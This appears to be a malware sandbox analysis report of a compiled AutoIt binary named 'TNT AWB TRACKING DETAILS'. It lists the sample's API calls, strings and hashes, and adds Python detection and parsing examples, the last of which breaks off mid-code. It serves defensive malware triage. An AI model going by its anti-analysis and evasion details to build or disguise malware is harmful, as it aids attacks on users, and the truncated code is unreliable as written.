                                                     • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                    • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                    • API String ID: 2673923337-2727554177
                                                    • Opcode ID: 1f3d99433d17bb7dfc1e5b0fdf34c3c4381a573d43f3d86ae1ba993b483d4d8d
                                                    • Instruction ID: 67998dbeab3df89be8392831c3acbfb428877c776656b7df706d9c16abf310ec
                                                    • Opcode Fuzzy Hash: 1f3d99433d17bb7dfc1e5b0fdf34c3c4381a573d43f3d86ae1ba993b483d4d8d
                                                    • Instruction Fuzzy Hash: A6719C711083099AC700EF25EC41EABBBE8FF89310B40596EF584E72B1DB71A949DB52

                                                    Control-flow Graph

                                                    APIs
                                                    • GetSysColorBrush.USER32(0000000F), ref: 00EC3A50
                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 00EC3A5F
                                                    • LoadIconW.USER32(00000063), ref: 00EC3A76
                                                    • LoadIconW.USER32(000000A4), ref: 00EC3A88
                                                    • LoadIconW.USER32(000000A2), ref: 00EC3A9A
                                                    • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00EC3AC0
                                                    • RegisterClassExW.USER32(?), ref: 00EC3B16
                                                      • Part of subcall function 00EC3041: GetSysColorBrush.USER32(0000000F), ref: 00EC3074
                                                      • Part of subcall function 00EC3041: RegisterClassExW.USER32(00000030), ref: 00EC309E
                                                      • Part of subcall function 00EC3041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00EC30AF
                                                      • Part of subcall function 00EC3041: InitCommonControlsEx.COMCTL32(?), ref: 00EC30CC
                                                      • Part of subcall function 00EC3041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00EC30DC
                                                      • Part of subcall function 00EC3041: LoadIconW.USER32(000000A9), ref: 00EC30F2
                                                      • Part of subcall function 00EC3041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00EC3101
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                     • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                    • String ID: #$0$AutoIt v3
                                                    • API String ID: 423443420-4155596026
                                                    • Opcode ID: f1875a70e4f90914e1b0ddf75fa3bb205fd671f3180722a8f17fbf822e6c7962
                                                    • Instruction ID: 3ed19f0c28c6714813443825ffd353d4d131578c2f3940be692f5a5bb5f489f7
                                                    • Opcode Fuzzy Hash: f1875a70e4f90914e1b0ddf75fa3bb205fd671f3180722a8f17fbf822e6c7962
                                                    • Instruction Fuzzy Hash: 13213EB590030CAFEB10DFA4ED09BAD7BB0EB09B15F004119E504A62A1D7B65954AF84

                                                    Control-flow Graph

                                                     Graph image not recoverable from text. Window procedure entered at ec3633-ec3681; basic blocks that call APIs: ec36ca-ec36d2 DefWindowProcW (default path for unhandled messages); ec36f9-ec370c KillTimer; ec3715-ec373c SetTimer and RegisterWindowMessageW; ec373e-ec3749 CreatePopupMenu; ec374b-ec3753 PostQuitMessage; efd097-efd0a3 SetFocus; efd0a8-efd0c7 MoveWindow. Internal helpers reached from the handler: ed1070, ed1093, ec443a, ec3114, ec434a, ec44a0, f17c36, f22527, f22d36.
                                                    APIs
                                                    • DefWindowProcW.USER32(?,?,?,?), ref: 00EC36D2
                                                    • KillTimer.USER32(?,00000001), ref: 00EC36FC
                                                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00EC371F
                                                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00EC372A
                                                    • CreatePopupMenu.USER32 ref: 00EC373E
                                                    • PostQuitMessage.USER32(00000000), ref: 00EC374D
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                    • String ID: TaskbarCreated
                                                    • API String ID: 129472671-2362178303
                                                    • Opcode ID: f37a5f1938c77b0e12913af5e9e10973cec4a9dc0dea4d48de76eb33844976bc
                                                    • Instruction ID: b7f47ed47cf8aa1ad1a0e1899ed395a2bcda144e97dfe1f558d99278e1967384
                                                    • Opcode Fuzzy Hash: f37a5f1938c77b0e12913af5e9e10973cec4a9dc0dea4d48de76eb33844976bc
                                                    • Instruction Fuzzy Hash: DB417DB120450DBBCB10AF74EE09FFA3B95E700305F10612EF906F62A2CB669D06B361

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                                                    • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW
                                                    • API String ID: 1825951767-3513169116
                                                    • Opcode ID: d0f30bf473b6a078387e772f39d3700a51520cb5b66eb98d2b7b4fba067a7dbe
                                                    • Instruction ID: 867abb04020f17a127a3b03d386473082530dd230a5cca28700114a7c69e2563
                                                    • Opcode Fuzzy Hash: d0f30bf473b6a078387e772f39d3700a51520cb5b66eb98d2b7b4fba067a7dbe
                                                    • Instruction Fuzzy Hash: ACA1707290022D9ADB04EBA0DE55FEEBBB9BF54300F00142DF416B7192DF759A0ACB60

                                                    Control-flow Graph
                                                    • Graph rendering omitted; single block ec39d5-ec3a45 calling CreateWindowExW twice and ShowWindow twice.
                                                    APIs
                                                    • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00EC3A03
                                                    • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00EC3A24
                                                    • ShowWindow.USER32(00000000,?,?), ref: 00EC3A38
                                                    • ShowWindow.USER32(00000000,?,?), ref: 00EC3A41
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: Window$CreateShow
                                                    • String ID: AutoIt v3$edit
                                                    • API String ID: 1584632944-3779509399
                                                    • Opcode ID: 109ef92eb9f4f67d29c30b40073c7b7f0abb18de32530b021f8e7d56c197836f
                                                    • Instruction ID: 8b9ca7cb9ac26d3f6bf9fbf858096f26ff4b75da94740a181369561d6b9d7681
                                                    • Opcode Fuzzy Hash: 109ef92eb9f4f67d29c30b40073c7b7f0abb18de32530b021f8e7d56c197836f
                                                    • Instruction Fuzzy Hash: DCF03A705402987FEB3157636C09EBB3E7DD7C7F50B00002AB904A2270CA650800EBB0

                                                    Control-flow Graph
                                                    • Graph rendering omitted; entry block ec407c. Imported APIs reached from the graph: LoadStringW, Shell_NotifyIconW (remaining calls are internal).
                                                    APIs
                                                    • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00EFD3D7
                                                      • Part of subcall function 00EC7BCC: _memmove.LIBCMT ref: 00EC7C06
                                                    • _memset.LIBCMT ref: 00EC40FC
                                                    • _wcscpy.LIBCMT ref: 00EC4150
                                                    • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00EC4160
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                                    • String ID: Line:
                                                    • API String ID: 3942752672-1585850449
                                                    • Opcode ID: 150d61ba60e8d44c72ff0b85f27fe3254d52c03541d14931fc208f36d2df7cb2
                                                    • Instruction ID: 280e4c0fa95c030b9dc90df77d796e7a67dae4c901133618d4e72a2a06d52cc4
                                                    • Opcode Fuzzy Hash: 150d61ba60e8d44c72ff0b85f27fe3254d52c03541d14931fc208f36d2df7cb2
                                                    • Instruction Fuzzy Hash: 1E31CB71108308ABD320EB60DD46FEB77D8AB54714F10591EF6C9A20A1EF71A64ACB93

                                                    Control-flow Graph
                                                    • Graph rendering omitted; entry block ee541d. The graph names only internal calls (ee8b28, ee8db6, ee2de0, ef0ba7, ee46e6, ef0e5b, ef0cc8), no imported API.
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                    • String ID:
                                                    • API String ID: 1559183368-0
                                                    • Opcode ID: dfdd2df0ab245b9716d30a375d324e0946404ce6e082d96a71c3349c3dbc91e5
                                                    • Instruction ID: 2367017e85ee70285972583567bcbfad44a05913f9b150d1eaa139df5cf3f0d5
                                                    • Opcode Fuzzy Hash: dfdd2df0ab245b9716d30a375d324e0946404ce6e082d96a71c3349c3dbc91e5
                                                    • Instruction Fuzzy Hash: C851BA72A00B8DDBCB248FAADC405AE77B6AF4032DF249729F835B62D1D7709D548B40

                                                    Control-flow Graph
                                                    • Graph rendering omitted; entry block ec686a. The graph names only internal calls (ec4ddd, f2955b, ec4e4a, ee0db6, f242f8, ec6a8c, ee2d55, ec7616, ec5d9b, f1f7a1, ee0e2c, ec7480, ec5db2, f273e9, f273d3, f273bd, ec750f, ec735d, ec5e2a, f1f73d, ec7de1, ec5904, ec6839, f1f65e, f2737f); the imported APIs it reaches are listed under APIs below.
                                                    APIs
                                                      • Part of subcall function 00EC4DDD: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00F852F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00EC4E0F
                                                    • _free.LIBCMT ref: 00EFE263
                                                    • _free.LIBCMT ref: 00EFE2AA
                                                      • Part of subcall function 00EC6A8C: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00EC6BAD
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: _free$CurrentDirectoryLibraryLoad
                                                    • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                    • API String ID: 2861923089-1757145024
                                                    • Opcode ID: 9f264793d613d92d8ab0bb5c73de3e2714892a70be2118252c3df8bab528034c
                                                    • Instruction ID: 45cbbae0c4aaaf21fcbaef75d8e7a688516cb5ba06bf0c3612a9a8fbe3adc2aa
                                                    • Opcode Fuzzy Hash: 9f264793d613d92d8ab0bb5c73de3e2714892a70be2118252c3df8bab528034c
                                                    • Instruction Fuzzy Hash: 28916E7190021DAFCF04EFA4CC919EEB7B8FF05314B10542AF916BB2A1EB75A946CB50
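Added example (not Joe Sandbox output and not code from the analysed sample): a small Python triage check that turns the AutoIt3 runtime strings the report surfaces in the String ID fields of the functions above (the `/AutoIt3ExecuteScript`, `/AutoIt3ExecuteLine`, `/AutoIt3OutputDebug` and `/ErrorStdOut` switches with `>>>AUTOIT NO CMDEXECUTE<<<`, the `AutoIt v3` window name, and `>>>AUTOIT SCRIPT<<<` with `Bad directive syntax error` in the script loader) into a static test that corroborates the "Binary is likely a compiled AutoIt script file" verdict on a file image. The per-marker weights, the threshold and the sample byte strings are assumptions constructed for this example. The scan tries both ASCII and UTF-16LE because the runtime compares these values as wide strings (`__wcsicmp_l`, `LoadLibraryExW`) while a dumped or packed image may carry either form.

```python
"""Static check for the compiled-AutoIt indicator.

Added example; not Joe Sandbox code and not taken from the analysed file.
Searches a file image for the AutoIt3 runtime marker strings in both ASCII
and UTF-16LE and derives a simple weighted score from the distinct markers
found.  Weights, threshold and sample inputs are assumptions for the example.
"""
from __future__ import annotations

from dataclasses import dataclass

# Marker strings as listed in the report's "String ID" fields.  The weights
# are an assumption for this example, not a Joe Sandbox scoring scheme.
AUTOIT_MARKERS: dict[str, int] = {
    ">>>AUTOIT SCRIPT<<<": 3,          # header the script loader looks for
    ">>>AUTOIT NO CMDEXECUTE<<<": 3,   # marker checked next to the /AutoIt3Execute* switches
    "/AutoIt3ExecuteScript": 2,
    "/AutoIt3ExecuteLine": 2,
    "/AutoIt3OutputDebug": 1,
    "/ErrorStdOut": 1,
    "Bad directive syntax error": 1,   # error text in the script loader
    "AutoIt v3": 1,                    # main window class/title created by the runtime
}


@dataclass(frozen=True)
class Hit:
    marker: str
    encoding: str   # "ascii" or "utf-16le"
    offset: int     # byte offset of the match in the image


def find_autoit_markers(image: bytes) -> list[Hit]:
    """Return every occurrence of a marker, in either encoding, sorted by offset."""
    hits: list[Hit] = []
    for marker in AUTOIT_MARKERS:
        for enc in ("ascii", "utf-16le"):
            needle = marker.encode(enc)
            start = 0
            while (pos := image.find(needle, start)) != -1:
                hits.append(Hit(marker, enc, pos))
                start = pos + 1
    return sorted(hits, key=lambda h: (h.offset, h.marker))


def autoit_score(image: bytes) -> int:
    """Sum the weight of each distinct marker present; repeats do not add up."""
    present = {h.marker for h in find_autoit_markers(image)}
    return sum(AUTOIT_MARKERS[m] for m in present)


def looks_like_compiled_autoit(image: bytes, threshold: int = 4) -> bool:
    """The embedded-script header alone is decisive; otherwise require several runtime strings."""
    present = {h.marker for h in find_autoit_markers(image)}
    return ">>>AUTOIT SCRIPT<<<" in present or autoit_score(image) >= threshold


# Constructed sample inputs (not bytes from the analysed file).
SAMPLE_WIDE = (b"MZ\x90\x00" + b"\x00" * 32
               + ">>>AUTOIT NO CMDEXECUTE<<<".encode("utf-16le") + b"\x00\x00"
               + "/AutoIt3ExecuteScript".encode("utf-16le") + b"\x00\x00"
               + "AutoIt v3".encode("utf-16le"))
SAMPLE_ASCII = b"MZ" + b"\x00" * 16 + b">>>AUTOIT SCRIPT<<<" + b"\x00" * 8
SAMPLE_CLEAN = b"MZ" + b"\x00" * 64 + b"Hello, world"

if __name__ == "__main__":
    for name, img in (("wide", SAMPLE_WIDE), ("ascii", SAMPLE_ASCII), ("clean", SAMPLE_CLEAN)):
        print(f"{name}: score={autoit_score(img)} compiled_autoit={looks_like_compiled_autoit(img)}")
        for h in find_autoit_markers(img):
            print(f"  {h.offset:#06x} {h.encoding:<8} {h.marker}")
```

Run it against a full PE image (`find_autoit_markers(open(path, "rb").read())`) rather than a single memory region: the script header string lives with the embedded script resource, while the switch strings sit in the runtime's .text/.rdata, and a partial dump may contain only one of the two. The offsets reported are raw file offsets, so they can be fed back into a disassembler or a YARA rule without conversion.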

                                                    Control-flow Graph
                                                    • Graph rendering omitted; entry block ec35b0. Imported APIs reached from the graph: RegOpenKeyExW, RegQueryValueExW, RegCloseKey.
                                                    APIs
                                                    • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,00EC35A1,SwapMouseButtons,00000004,?), ref: 00EC35D4
                                                    • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,00EC35A1,SwapMouseButtons,00000004,?,?,?,?,00EC2754), ref: 00EC35F5
                                                    • RegCloseKey.KERNELBASE(00000000,?,?,00EC35A1,SwapMouseButtons,00000004,?,?,?,?,00EC2754), ref: 00EC3617
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: CloseOpenQueryValue
                                                    • String ID: Control Panel\Mouse
                                                    • API String ID: 3677997916-824357125
                                                    • Opcode ID: 35d00f86a57b2aacae23caf70a1fc4995fbebb9f719fee6bce0d5538fea630ea
                                                    • Instruction ID: af8119c12fb6fa0ea32f4793acfdedba645f42f39f87a9d691ba3543c8fac2d6
                                                    • Opcode Fuzzy Hash: 35d00f86a57b2aacae23caf70a1fc4995fbebb9f719fee6bce0d5538fea630ea
                                                    • Instruction Fuzzy Hash: B1115A75910208BFDB20CF68DD40EEEBBB8EF45744F0194A9F809E7210D2729F45A760
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                    • String ID:
                                                    • API String ID: 2782032738-0
                                                    • Opcode ID: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                    • Instruction ID: 1f5c5949d8d55bf6f71bac268453eeacf76d0c44109ea417437f1a898d8a7a30
                                                    • Opcode Fuzzy Hash: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                    • Instruction Fuzzy Hash: 3E41A5B5A007CD9BDB1C8EABC8809AE77A6EF41364F14917EF415A76C0E770DD408B84
                                                    APIs
                                                    • _memset.LIBCMT ref: 00EFEA39
                                                    • GetOpenFileNameW.COMDLG32(?), ref: 00EFEA83
                                                      • Part of subcall function 00EC4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00EC4743,?,?,00EC37AE,?), ref: 00EC4770
                                                      • Part of subcall function 00EE0791: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00EE07B0
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: Name$Path$FileFullLongOpen_memset
                                                    • String ID: X
                                                    • API String ID: 3777226403-3081909835
                                                    • Opcode ID: 5751076fc4baf3be607ed09dd4fce27ebb15766f12a13420122b9f8b79d0685d
                                                    • Instruction ID: a4bffd52145d98a33a33e174abba5a1307c54c7244b3b591d1f19ec4fa7f8899
                                                    • Opcode Fuzzy Hash: 5751076fc4baf3be607ed09dd4fce27ebb15766f12a13420122b9f8b79d0685d
                                                    • Instruction Fuzzy Hash: DF21F670A0028C9BCB019F94CC45BEE7BF8AF48314F00801AE548BB242DFF5598ACF91
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: __fread_nolock_memmove
                                                    • String ID: EA06
                                                    • API String ID: 1988441806-3962188686
                                                    • Opcode ID: ae0f6417742474ae94ff8d47e444d5b88dca2713d40eb6981580a9144a7d2a13
                                                    • Instruction ID: 1d0c6a47fb23863b7fe7b882a6a2c9f703a5bfc489ea6b1dc115776ac5b76093
                                                    • Opcode Fuzzy Hash: ae0f6417742474ae94ff8d47e444d5b88dca2713d40eb6981580a9144a7d2a13
                                                    • Instruction Fuzzy Hash: 9501F972D042587EDF18CAA9C816EFE7BF8DB11311F00459BF552D2181E874E6089760
                                                    APIs
                                                    • GetTempPathW.KERNEL32(00000104,?), ref: 00F298F8
                                                    • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00F2990F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                     • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: Temp$FileNamePath
                                                    • String ID: aut
                                                    • API String ID: 3285503233-3010740371
                                                    • Opcode ID: 37bcc69790b26eb68a1169389bd454d440fe0a51fa0c1843865a22b41b03fbd6
                                                    • Instruction ID: d710f74107e522390e6917bbca019ef6dd0771745b77fef74a1d3acdced8d446
                                                    • Opcode Fuzzy Hash: 37bcc69790b26eb68a1169389bd454d440fe0a51fa0c1843865a22b41b03fbd6
                                                    • Instruction Fuzzy Hash: E4D05E7958030DABDB509FA0DC0EF9A773CE714700F0042B1BE58910A1EAB096999B92
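The API reference lists in these function records share one layout: a bullet, the API name and its module, the arguments the sandbox resolved (`?` where it could not), and the call site after `ref:`, with `Part of subcall function <addr>:` marking calls reached through a callee. The Python below is an added example, not code from the Joe Sandbox report or its tooling: it parses lines in that layout into records and runs the two checks a triager does first on a sample like this one, the `GetTempFileNameW` call whose prefix resolves to the literal `aut` (the marker behind the "compiled AutoIt script" signature, since the AutoIt runtime extracts its embedded script to a temp file named that way) and any `IsDebuggerPresent` reached via a subcall, and decodes `CreateFileW` access and disposition values using the documented Win32 constants. The sample input is constructed in that layout; its addresses and arguments are illustrative.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample in the layout of this report's "APIs" lists. The
# addresses and arguments are illustrative (hypothetical), not copied from
# any other function record on the page.
SAMPLE = """\
APIs
• GetTempPathW.KERNEL32(00000104,?), ref: 00F298F8
• GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00F2990F
  • Part of subcall function 00EC3B3A: IsDebuggerPresent.KERNEL32 ref: 00EC3B7A
• CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000), ref: 00F298BB
• CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000), ref: 00EFDD73
Strings
"""

# One API reference line: optional "Part of subcall function <addr>:" prefix,
# <name>.<module>, optional "(args)", then the call site after "ref:".
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<caller>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>[\w@:$]+)\.(?P<module>[\w.]+)"
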